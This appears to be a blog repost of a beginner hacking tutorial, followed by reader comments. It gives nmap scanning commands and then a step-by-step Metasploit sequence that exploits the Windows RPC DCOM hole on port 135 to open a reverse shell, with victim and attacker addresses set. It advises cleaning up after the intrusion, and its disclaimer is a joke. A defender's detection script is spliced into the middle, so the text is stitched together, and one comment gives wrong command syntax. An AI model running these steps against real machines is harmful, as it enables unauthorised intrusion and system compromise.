Thursday, April 24, 2014
exploiting Windows, Linux, and MACs

An explanation of how to use exploits with msf in order to get a payload onto a remote machine (i.e. reverse shell, immediate root, etc.).

*******************************************************************
For any evil genius out there, I just want to tell you that this tutorial is for educational purposes only, and should be used with care, and not against ANY server without the permission of the admin. ( * cough-cough * ) must be the bird flu.
*******************************************************************

INTRODUCTION
As you might already know, many computers today come with unconfigured software packages which might compromise the PC's security. The software run by these computers uses PORTS (you can think of them as the medium through which information is sent to and from the machine). Ports associated with software allow an attacker to exploit flaws in that software, thus giving a person ROOT (admin). Now how do you do this, you might ask. That's why you should read on furiously, in order to find out.

PORT SCANNING
One has to scan the computer they want to "hack", provided they know its IP address. This is usually done with a port scanner, like NMAP (www.insecure.org/nmap/). In order to scan your whole network, for example a Verizon DSL home LAN, I would use:
nmap -v 192.168.1.* (with root status)
and if you see your target in the list, then proceed to focus your scan on their IP address, but this time with more options. I usually do:
nmap -v -sS -P0 -nAF 192.168.1.46 (just as an example of a victim I'm scanning in my LAN)
The goal here is to find open ports.
When scanning Windows machines, I look for port 135 - the Microsoft Remote Procedure Call (RPC) service - and try to exploit the service running behind it.

METASPLOIT FRAMEWORK
Let's say that port 135 is open. We will proceed to exploit the software running behind it. In order to do that, we download the Metasploit Framework from:
http://www.metasp. . .loads.html
Then install it, and go to the directory containing it. If launched properly, it should say (in your shell or CMD prompt):
MSF >
Type in:
msfupdate - updates your exploits and payloads
show exploits - lists all available exploits
info msrpc_dcom_ms03_026 - info about the exploit
use msrpc_dcom_ms03_026 - use the exploit
show payloads - lists the payloads we can generate
info win32_reverse_ord - info about the payload
set PAYLOAD win32_reverse_ord - use this payload
set RHOST 192.168.1.46 - victim's IP address
set RPORT 135 - victim's port to use
set LHOST 192.168.1.1 - attacker's IP address
set LPORT 4321 - attacker's port to report to
show options - information about the attack

When you're SURE/ready to perform your attack, type:
exploit - BOOM! You're IN, my friend -- if all went well.

Type in:
ipconfig /all - to see the IP address you're using...
It should say 192.168.1.46 (just as an example of the victim's IP address).
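As an added example from the defender's side (not part of the original article), the following Python checks constructed flow-log lines for the two steps described above: a fast port sweep from one source, and an inbound connection to 135/tcp followed shortly by an outbound connection from the scanned host back to that same source on an unusual port, which is what the reverse payload reporting to LPORT 4321 looks like on the wire. The log format, thresholds and addresses are assumptions made for the example.

```python
from collections import defaultdict
from datetime import datetime
# Constructed sample flow log (not real data): time direction src sport dst dport
LOG = """\
2006-04-01T15:00:01 in 192.168.1.1 40001 192.168.1.46 21
2006-04-01T15:00:01 in 192.168.1.1 40002 192.168.1.46 22
2006-04-01T15:00:01 in 192.168.1.1 40003 192.168.1.46 80
2006-04-01T15:00:02 in 192.168.1.1 40004 192.168.1.46 135
2006-04-01T15:00:02 in 192.168.1.1 40005 192.168.1.46 139
2006-04-01T15:02:10 in 192.168.1.1 40100 192.168.1.46 135
2006-04-01T15:02:11 out 192.168.1.46 1041 192.168.1.1 4321
2006-04-01T15:30:00 in 192.168.1.7 51000 192.168.1.46 445
"""
SCAN_PORTS, SCAN_WINDOW_S = 5, 60        # distinct dst ports from one source per window (assumed)
RPC_PORT, CALLBACK_WINDOW_S = 135, 120   # seconds allowed between the 135/tcp hit and callback (assumed)

def parse(log):
    """Turn the log text into (ts, direction, src, dst, dport) tuples."""
    rows = []
    for line in log.splitlines():
        ts, direction, src, _sport, dst, dport = line.split()
        rows.append((datetime.fromisoformat(ts), direction, src, dst, int(dport)))
    return rows

def detect_port_sweeps(rows):
    """Return {src: sorted ports} for sources probing many distinct ports quickly."""
    by_src = defaultdict(list)
    for ts, direction, src, _, dport in rows:
        if direction == "in":
            by_src[src].append((ts, dport))
    hits = {}
    for src, events in by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            ports = {p for t, p in events[i:] if (t - t0).total_seconds() <= SCAN_WINDOW_S}
            if len(ports) >= SCAN_PORTS:
                hits[src] = sorted(ports)
                break
    return hits

def detect_rpc_callbacks(rows):
    """Inbound 135/tcp A->B followed by B connecting back out to A: returns (B, A, port)."""
    alerts = []
    for ts, direction, src, dst, dport in rows:
        if direction != "in" or dport != RPC_PORT:
            continue
        for t2, d2, s2, dst2, p2 in rows:
            delta = (t2 - ts).total_seconds()
            if d2 == "out" and s2 == dst and dst2 == src and 0 <= delta <= CALLBACK_WINDOW_S:
                alerts.append((dst, src, p2))
    return alerts
```

Note that the 135/tcp probe made during the sweep itself does not raise a callback alert, because no outbound connection follows it within the window; only the later hit paired with the 4321/tcp callback does.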

CONCLUSION
I'll assume you know how to clean up after the intrusion. So, be smart and careful about anything you do to the remote PC (since you're ROOT).

NOTE
I hope you enjoyed my article (this is my first, so please take it easy on the ratings for me... I promise to make clearer ones next time). Also, this is only one exploit. There are many combinations you can use to "hack" Linux, Mac, and Windows boxes. In other words, this is really applicable when it comes to gaining root, or executing arbitrary code on a remote machine.

Comments

god on April 01 2006 - 15:17:28
Mm, I liked it... but how about writing the "how to clean up after the intrusion" part? At least for the case where the victim is using Linux... or Windows or anything.
Wsoprulz1299 on April 01 2006 - 22:48:56
Pointless article really :\ doesn't go into any real detail about anything.
Wsoprulz1299 on April 01 2006 - 22:49:00
Pointless article really :\ doesn't go into any real detail about anything.
Darth_Pengo on April 02 2006 - 13:03:30
Wsoprulz1299: According to Microsoft, it's by design.
fegge on April 16 2006 - 14:08:01
Well, I am at the same level.
d0ct0r on May 26 2007 - 12:57:51
I don't get the "use win32_reverse_ord" command to work, are you sure that's how you use a payload? Or am I doing it wrong?
d0ct0r on May 26 2007 - 13:11:15
Nvm, it was supposed to be "set PAYLOAD use win32_reverse_ord".
Zephyr_Pure on October 12 2007 - 20:40:13
It's an alright article describing a single vector of attack. A little more background on what the exploit actually does, why RPC is vulnerable, and changing the title to reflect the coverage of a single attack would've made it much better. Anyways, it did what it set out to do, so I can't rate it anything less than good.